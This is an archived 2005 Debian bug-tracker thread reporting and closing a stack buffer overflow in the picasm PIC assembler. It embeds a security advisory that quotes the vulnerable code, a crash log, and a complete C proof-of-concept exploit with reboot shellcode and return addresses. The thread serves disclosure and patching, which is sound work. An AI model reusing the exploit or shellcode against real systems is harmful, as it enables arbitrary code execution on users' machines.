Your message dated Mon, 23 May 2005 11:02:34 -0400
with message-id <[EMAIL PROTECTED]>
and subject line Bug#309982: fixed in picasm 1.12c-1
has caused the attached Bug report to be marked as done.
This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.
(NB: If you are a system administrator and have no idea what I am
talking about this indicates a serious mail system misconfiguration
somewhere. Please contact me immediately.)
Debian bug tracking system administrator
(administrator, Debian Bugs database)
--------------------------------------
Received: (at submit) by bugs.debian.org; 20 May 2005 22:43:16 +0000
>From [EMAIL PROTECTED] Fri May 20 15:43:16 2005
Return-path: <[EMAIL PROTECTED]>
Received: from inutil.org (vserver151.vserver151.serverflex.de)
[193.22.164.111]
by spohr.debian.org with esmtp (Exim 3.35 1 (Debian))
id 1DZGD5-0002kG-00; Fri, 20 May 2005 15:43:15 -0700
Received: from p5489779f.dip.t-dialin.net ([84.137.119.159]
helo=localhost.localdomain)
by vserver151.vserver151.serverflex.de with esmtpsa
(TLS-1.0:RSA_AES_256_CBC_SHA:32)
(Exim 4.50)
id 1DZGBJ-0002aL-5I
for [EMAIL PROTECTED]; Sat, 21 May 2005 00:41:25 +0200
Received: from jmm by localhost.localdomain with local (Exim 4.50)
id 1DZGCw-0001tM-Us; Sat, 21 May 2005 00:43:06 +0200
Content-Type: text/plain; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
From: Moritz Muehlenhoff <[EMAIL PROTECTED]>
To: Debian Bug Tracking System <[EMAIL PROTECTED]>
Subject: Multiple buffer overflows in picasm
X-Mailer: reportbug 3.11
Date: Sat, 21 May 2005 00:43:06 +0200
X-Debbugs-Cc: [EMAIL PROTECTED]
Message-Id: <[EMAIL PROTECTED]>
X-SA-Exim-Connect-IP: 84.137.119.159
X-SA-Exim-Mail-From: [EMAIL PROTECTED]
X-SA-Exim-Scanned: No (on vserver151.vserver151.serverflex.de); SAEximRunCond
expanded to false
Delivered-To: [EMAIL PROTECTED]
X-Spam-Checker-Version: SpamAssassin 2.60-bugs.debian.org_2005_01_02
(1.212-2003-09-23-exp) on spohr.debian.org
X-Spam-Status: No, hits=-7.8 required=4.0 tests=BAYES_20,HAS_PACKAGE,
LARGE_HEX,X_DEBBUGS_CC autolearn=ham
version=2.60-bugs.debian.org_2005_01_02
X-Spam-Level:
Package: picasm
Severity: grave
Tags: security
Justification: user security hole
Multiple buffer overflows in picasm's code for generating error messages
have been found that can be exploited through crafted source code with
overly long preprocessor directives. For full details please see this
advisory by Shaun Colley, for which I could not find an online reference:
Cheers,
Moritz
picasm error handling stack overflow vulnerability
Name: picasm error handling stack overflow
Versions Affected: picasm <= 1.12b
Severity: Medium/High
Impact: Arbitrary code execution
Maintainer's Website: <http://www.co.jyu.fi/~trossi>
Author: Shaun Colley
Vendor Notified: May 7th 2005
Public Disclosure: May 20th 2005
BACKGROUND
**************
picasm is a Microchip PIC16Cxx assembler, designed to run on most
UNIX-like operating systems. picasm now extends support to several
other PICs, including the 2c508 and 12c509 devices.
picasm is available via the FreeBSD ports system as devel/picasm. The
maintainer, Timo Rossi, also provides it on his microcontroller web
page <http://www.co.jyu.fi/~trossi/pic>.
DETAILS
********
When generating error and warning messages, picasm copies strings into
fixed length buffers without bounds checking. Below is the
responsible code.
---
void
warning(char *fmt, ...)
{
char outbuf[128];
va_list args;
err_line_ref();
strcpy(outbuf, "Warning: ");
va_start(args, fmt);
vsprintf(outbuf+9, fmt, args); [1]
...
void
error(int lskip, char *fmt, ...)
{
va_list args;
char outbuf[128];
err_line_ref();
strcpy(outbuf, "Error: ");
va_start(args, fmt);
vsprintf(outbuf+7, fmt, args); [2]
...
void
fatal_error(char *fmt, ...)
{
va_list args;
char outbuf[128];
err_line_ref();
strcpy(outbuf, "Fatal error: ");
va_start(args, fmt);
vsprintf(outbuf+13, fmt, args); [3]
...
}
---
Where [1], [2] and [3], the error handling routines call vsprintf() to
copy a passed format string into a fixed length buffer. If the 'fmt'
function argument could be controlled, a stack overflow could occur.
As the author explains in the documentation, picasm supports an
'error' directive similar to NASM's '%error' preprocessor.
...
error <error_message> Causes an assembly error.
...
An overly long <error_message> provided to an 'error' directive in a
source file would cause calling of error() and result in a stack
overflow as seen in [2].
If an attacker could trick a user into assembling a source file with a
malformed 'error' directive, arbitrary code could be executed with the
privileges of the user. This could result in full system compromise.
There may be other attack vectors, such as causing picasm to generate
a long warning message, but this has not been investigated.
EXPLOITATION
**************
An attacker who can convince a user to assemble a malformed source
file can execute arbitrary code with the privileges of the user.
Exploitation is straight forward. The log below shows sample exploitation.
---
bash-3.00# echo `perl -e 'print "error " . "a"x2000'` > test.asm
bash-3.00# picasm test.asm
test.asm:1:
error
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
Error:
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
Segmentation fault (core dumped)
bash-3.00# gdb -q -c picasm.core
Core was generated by `picasm'.
Program terminated with signal 11, Segmentation fault.
#0 0x61616161 in ?? ()
(gdb) quit
bash-3.00#
--
A proof-of-concept exploit has been written and successfully tested
using the picasm (v1.12b) port on FreeBSD 5.3-RELEASE. The exploit
crafts a file with a malformed 'error' directive which causes
execution to be directed to reboot() shellcode upon overflow.
---
/* picasm_exploit.c - by Shaun Colley <shaun rsc cx>
*
* This code generates a picasm source file with a malformed 'error' directive,
* which exploits a stack overflow vulnerability in picasm's error printing
* routines. The file generated by this exploit will only cause execution
* of FreeBSD 'reboot()' shellcode. Exploit has been tested on
FreeBSD 5.3-RELEASE.
* Return address into shellcode may need changing on other operating system
* versions. Other shellcodes can potentially be used instead of the
one below.
*
* A fix has been provided by picasm's maintainer. The fixed packages can be
* found at <http://www.co.jyu.fi/~trossi/pic/picasm112c.tar.gz>.
*/
#include <stdio.h>
#include <stdlib.h>
/* FreeBSD reboot shellcode by zillion
* zillion safemode org */
char shellcode[] =
"\x31\xc0\x66\xba\x0e\x27\x66\x81\xea\x06\x27\xb0\x37\xcd\x80";
int main(int argc, char *argv[]) {
if(argc < 2) {
printf("syntax: %s <outfile>\n", argv[0]);
return 1;
}
char buf[144];
/* FreeBSD 5.3-RELEASE */
char ret[] = "\x78\xea\xbf\xbf";
/* Works when X server is not running */
/*char ret[] = "\x08\xeb\xbf\xbf";*/
char *ptr;
FILE *fp;
ptr = buf;
/* Craft payload */
memset(ptr, 0, sizeof(buf));
memset(ptr, 0x90, 118); /* 118 NOP bytes */
memcpy(ptr+118, shellcode, sizeof(shellcode)); /* 15 byte shellcode */
memcpy(ptr+133, ret, 4); /* 4 byte ret address */
/* Open outfile */
if((fp = fopen(argv[1], "w")) == NULL) {
printf("unable to open %s\n", argv[1]);
exit(1);
}
/* Write it all to outfile */
fwrite("error ", 1, 6, fp);
fprintf(fp, "%s", buf);
fclose(fp);
return 0;
}
---
(If the code looks distorted, reference
<http://www.demodulated.net/code/picasm_exploit.c>)
FIX INFORMATION
*****************
The maintainer, Timo Rossi, has fixed the picasm packages and provided
a new security release, picasm 1.12c. The fixed packages are
available from <http://www.co.jyu.fi/~trossi/pic/picasm112c.tar.gz>.
Thanks to Timo Rossi for his cooperation in fixing the issue.
-- System Information:
Debian Release: 3.1
APT prefers unstable
APT policy: (500, 'unstable')
Architecture: i386 (i686)
Kernel: Linux 2.6.11
Locale: LANG=C, [EMAIL PROTECTED] (charmap=ISO-8859-15)
---------------------------------------
Received: (at 309982-close) by bugs.debian.org; 23 May 2005 15:09:28 +0000
>From [EMAIL PROTECTED] Mon May 23 08:09:28 2005
Return-path: <[EMAIL PROTECTED]>
Received: from newraff.debian.org [208.185.25.31] (mail)
by spohr.debian.org with esmtp (Exim 3.35 1 (Debian))
id 1DaEYa-0002DI-00; Mon, 23 May 2005 08:09:28 -0700
Received: from katie by newraff.debian.org with local (Exim 3.35 1 (Debian))
id 1DaERu-0002Go-00; Mon, 23 May 2005 11:02:34 -0400
From: Ludovic Drolez <[EMAIL PROTECTED]>
To: [EMAIL PROTECTED]
X-Katie: $Revision: 1.55 $
Subject: Bug#309982: fixed in picasm 1.12c-1
Message-Id: <[EMAIL PROTECTED]>
Sender: Archive Administrator <[EMAIL PROTECTED]>
Date: Mon, 23 May 2005 11:02:34 -0400
Delivered-To: [EMAIL PROTECTED]
X-Spam-Checker-Version: SpamAssassin 2.60-bugs.debian.org_2005_01_02
(1.212-2003-09-23-exp) on spohr.debian.org
X-Spam-Status: No, hits=-6.0 required=4.0 tests=BAYES_00,HAS_BUG_NUMBER
autolearn=no version=2.60-bugs.debian.org_2005_01_02
X-Spam-Level:
Source: picasm
Source-Version: 1.12c-1
We believe that the bug you reported is fixed in the latest version of
picasm, which is due to be installed in the Debian FTP archive:
picasm_1.12c-1.diff.gz
to pool/main/p/picasm/picasm_1.12c-1.diff.gz
picasm_1.12c-1.dsc
to pool/main/p/picasm/picasm_1.12c-1.dsc
picasm_1.12c-1_i386.deb
to pool/main/p/picasm/picasm_1.12c-1_i386.deb
picasm_1.12c.orig.tar.gz
to pool/main/p/picasm/picasm_1.12c.orig.tar.gz
A summary of the changes between this version and the previous one is
attached.
Thank you for reporting the bug, which will now be closed. If you
have further comments please address them to [EMAIL PROTECTED],
and the maintainer will reopen the bug report if appropriate.
Debian distribution maintenance software
pp.
Ludovic Drolez <[EMAIL PROTECTED]> (supplier of updated picasm package)
(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing [EMAIL PROTECTED])
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Format: 1.7
Date: Mon, 23 May 2005 12:35:49 +0200
Source: picasm
Binary: picasm
Architecture: source i386
Version: 1.12c-1
Distribution: unstable
Urgency: low
Maintainer: Ludovic Drolez <[EMAIL PROTECTED]>
Changed-By: Ludovic Drolez <[EMAIL PROTECTED]>
Description:
picasm - Assembler for the Microchip PIC-family Microcontrollers
Closes: 309982
Changes:
picasm (1.12c-1) unstable; urgency=low
.
* New upstream release which fixes some buffer overflows.
Closes: #309982
Files:
2c80602f573c8cce063e935df0a78523 558 otherosfs optional picasm_1.12c-1.dsc
38a4eb1a533bea197dfb8fc190837ac9 40717 otherosfs optional
picasm_1.12c.orig.tar.gz
78f175dfe1fe728a354fe1d9474ce9d6 3390 otherosfs optional picasm_1.12c-1.diff.gz
7cb25d1b72f905a518cc646493c190dc 39546 otherosfs optional
picasm_1.12c-1_i386.deb
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.5 (GNU/Linux)
iD8DBQFCket5sRlQAP1GppgRAm1qAJ0YqjPRM98kSXtoEu6v7/kScW1USQCfYlb3
CiswCacDeDdKQkcBjT8089Y=
=cNa6
-----END PGP SIGNATURE-----
--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
